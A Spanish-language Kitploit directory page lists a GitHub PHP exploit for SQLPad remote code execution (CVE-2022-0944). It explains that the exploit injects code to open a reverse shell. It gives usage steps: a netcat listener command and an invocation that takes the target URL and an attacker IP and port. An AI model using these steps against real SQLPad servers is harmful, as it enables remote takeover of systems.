Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Exploit de ejecución remota de código | Kitploit
Herramientas/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Exploit de ejecución remota de código

Ver Repositorio
16hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cómo funciona:

Este código PHP está diseñado para explotar una vulnerabilidad de Ejecución Remota de Código (RCE) en SQLPad, relacionada con CVE-2022-0944.
Funciona inyectando código malicioso en la aplicación SQLPad, forzándola a ejecutar un comando del sistema que abre una reverse shell – una conexión que otorga al atacante control remoto del sistema vulnerable.


Requisitos previos:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (PHP cURL library) – sudo apt-get install php-curl

Uso:

1. Configurar el Listener (en la Máquina Atacante)

Para capturar la conexión reverse shell, inicie Netcat en la máquina del atacante:

nc -lvnp 4444

Ejecutar el Exploit

php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: La URL raíz de la SQLPad vulnerable (p.ej., http://target.com:3000)

<attacker_ip>: La dirección IP del atacante que escucha la conexión reverse shell (misma que la IP de Netcat)

<attacker_port>: El puerto en el que el atacante está escuchando (mismo que el puerto de Netcat)

Referencias

La lógica original del exploit se basó en este repositorio:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Mi objetivo aquí fue entender la lógica del exploit y reescribirlo en otro lenguaje de programación como un desafío personal.

Referencia adicional: 🔗 CVE-2022-0944 – NVD

Descargar herramienta